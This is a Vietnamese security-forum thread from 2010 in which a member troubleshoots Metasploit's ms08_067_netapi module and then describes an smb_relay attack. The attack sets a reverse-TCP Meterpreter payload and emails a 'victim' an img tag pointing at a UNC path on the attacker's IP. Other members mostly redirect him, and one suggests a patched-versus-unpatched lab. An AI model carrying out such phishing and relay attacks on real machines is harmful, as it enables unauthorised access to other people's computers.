banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập metasploit -  XML
  [Discussion]   metasploit - 03/06/2010 12:05:21 (+0700) | #1 | 212230
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

co ai biet tai sao khong ?
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 12:10:00 (+0700) | #2 | 212231
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

co ai biet tai sao khong ? 


Có lẽ mục tiêu không bị vulnerable hoặc nó được một bộ phận nào đó bảo vệ.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 12:19:21 (+0700) | #3 | 212232
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]

conmale wrote:

vuongphong wrote:
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

co ai biet tai sao khong ? 


Có lẽ mục tiêu không bị vulnerable hoặc nó được một bộ phận nào đó bảo vệ. 

cam on nhe.
nhan tien cho em hoi luon ve windows/smb/smb_relay. khong that su hieu . xin chi no hoat dong nhu the nao ?
thanks
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 12:26:11 (+0700) | #4 | 212233
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:

conmale wrote:

vuongphong wrote:
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >

co ai biet tai sao khong ? 


Có lẽ mục tiêu không bị vulnerable hoặc nó được một bộ phận nào đó bảo vệ. 

cam on nhe.
nhan tien cho em hoi luon ve windows/smb/smb_relay. khong that su hieu . xin chi no hoat dong nhu the nao ?
thanks 


Tôi không hiểu câu hỏi của bồ. Đề nghị bồ gõ tiếng Việt có dấu và trình bày rõ ràng hơn.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 12:31:06 (+0700) | #5 | 212234
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >?
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 12:49:37 (+0700) | #6 | 212237
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >? 


Bồ có thử tìm hiểu qua "smbrelay" là gì chưa?
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 14:46:09 (+0700) | #7 | 212247
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]

conmale wrote:

vuongphong wrote:
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >? 


Bồ có thử tìm hiểu qua "smbrelay" là gì chưa? 

hiểu sơ sơ thôi
bác có thể miêu tả quá trình không >
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 14:58:40 (+0700) | #8 | 212249
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:

conmale wrote:

vuongphong wrote:
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >? 


Bồ có thử tìm hiểu qua "smbrelay" là gì chưa? 

hiểu sơ sơ thôi
bác có thể miêu tả quá trình không > 


Bồ nên trình bày cái "hiểu sơ sơ" đó thì dễ hơn và thuận tiện hơn cho việc thảo luận.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 15:38:43 (+0700) | #9 | 212251
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit

tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 15:40:02 (+0700) | #10 | 212252
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
trong email :<img src="\\myip\Share\pic.jpg">
just climb, even slowly, you can reach the peak
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 15:56:20 (+0700) | #11 | 212253
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit

tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
 


Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 16:00:00 (+0700) | #12 | 212254
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]

conmale wrote:

vuongphong wrote:
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit

tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
 


Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa. 

liệu mình có thể tìm ra những lỗ hổng chưa được vá trên máy victim bằng nmap không nhỉ ? cho mình vài command đi.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 16:26:45 (+0700) | #13 | 212260
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:

conmale wrote:

vuongphong wrote:
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit

tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
 


Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa. 

liệu mình có thể tìm ra những lỗ hổng chưa được vá trên máy victim bằng nmap không nhỉ ? cho mình vài command đi. 


nmap chỉ là port scanner. Nó không phải là tool để tìm lổ hổng bảo mật.

PS: nên tạo chủ đề mới cho thắc mắc mới và nên thử tìm thông tin trên diễn đàn trước khi tạo chủ đề bởi vì những thắc mắc này hầu như đã có người hỏi trước đây.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 18:05:21 (+0700) | #14 | 212270
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]

conmale wrote:

vuongphong wrote:

conmale wrote:

Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa. 

liệu mình có thể tìm ra những lỗ hổng chưa được vá trên máy victim bằng nmap không nhỉ ? cho mình vài command đi. 


nmap chỉ là port scanner. Nó không phải là tool để tìm lổ hổng bảo mật.

PS: nên tạo chủ đề mới cho thắc mắc mới và nên thử tìm thông tin trên diễn đàn trước khi tạo chủ đề bởi vì những thắc mắc này hầu như đã có người hỏi trước đây. 

cùng chung về metasploit mà. mình không thật sự thấy những giải đáp cho thắc mắc của mình trong những trang tài liệu trước. mọi người cùng hỏi hỏi và trao đổi mà với lại có hứng thú gì đâu khi đọc báo cũ.
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 19:22:36 (+0700) | #15 | 212279
[Avatar]
H3x4
Member

[Minus]    0    [Plus]
Joined: 02/04/2009 00:03:16
Messages: 242
Offline
[Profile] [PM]
Hi bạn, theo mình bạn nên setup một cái box windoz cũ không có security patch rồi sau đó tập tành, đầu tiên hãy exploit khi chưa cài bản vá cho cái vuln đó, sau đó hãy patch lại và làm lại một lần nữa. Để so sánh sự khác nhau bạn có thể dùng wireshark chẳng hạn, cụ thể nó sẽ send data gì và nhận về như thế nào?
Nmap đúng như conmale nói chỉ là port scanner và os detecting tool. Muốn xác định victim có lỗi hay không phải sử dụng vulnerability scanner lấy thí dụ như nessus còn không thì tốt nhất ráng tìm hiểu cặn kẽ cái lỗi đó rồi tự mình code 1 scanner cho cái lỗi đó chẳng hạn smilie Bạn sẽ thấy thú vị hơn nhiều với cái chương trình do bạn làm ra so với ngồi ném một hòn đá vào cái giếng tối đen sâu hút rồi chờ nghe tiếng vọng lại smilie Cái exploit của bạn có nhiều nguyên nhân khiến nó không thành công lắm, có thể do network, firewall, patch mà cũng có thể nó đến từ chính hệ thống của bạn.
Tốt nhất cứ hãy tìm hiểu coi thực sự sau lệnh exploit trong metasploit thì nó xảy ra cái dụ gì dưới đó smilie
[Up] [Print Copy]
  [Discussion]   metasploit - 03/06/2010 19:26:29 (+0700) | #16 | 212281
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
cảm ơn nhiều lám bạn.
uh mình cũng biết nmap chỉ giúp mình xác định các cỏng mở đóng thôi.
i follow what u said
just climb, even slowly, you can reach the peak
[Up] [Print Copy]
  [Discussion]   metasploit - 04/06/2010 06:56:01 (+0700) | #17 | 212294
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

vuongphong wrote:

cùng chung về metasploit mà. mình không thật sự thấy những giải đáp cho thắc mắc của mình trong những trang tài liệu trước. mọi người cùng hỏi hỏi và trao đổi mà với lại có hứng thú gì đâu khi đọc báo cũ


Bồ đừng nghĩ như vậy. Những thảo luận trên diễn đàn trước đây có thể cũ xét theo thời gian nhưng chúng vẫn hoàn toàn mới đối với bồ và chúng không phải là "báo".
[Up] [Print Copy]
  [Discussion]   metasploit - 04/06/2010 08:10:42 (+0700) | #18 | 212298
[Avatar]
vuongphong
Member

[Minus]    0    [Plus]
Joined: 02/06/2010 10:34:16
Messages: 24
Location: sách
Offline
[Profile] [PM]
('smilie');
uh, xin lỗi khi đã đưa một tuyên ngôn sai lầm.
('smilie');
mới xong mình đọc một bài hay tuyệt về metasploit trong hva .thanks
nhân tiện: ('smilie');
nhận dịch các tài liệu về metasploit. ('smilie'); thêm tài liệu mà. email : 10.0.16.20@gmail.com
ai ở đà lạt liên lạc trực tiếp nhé : 0167.6006.939 ('smilie');
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|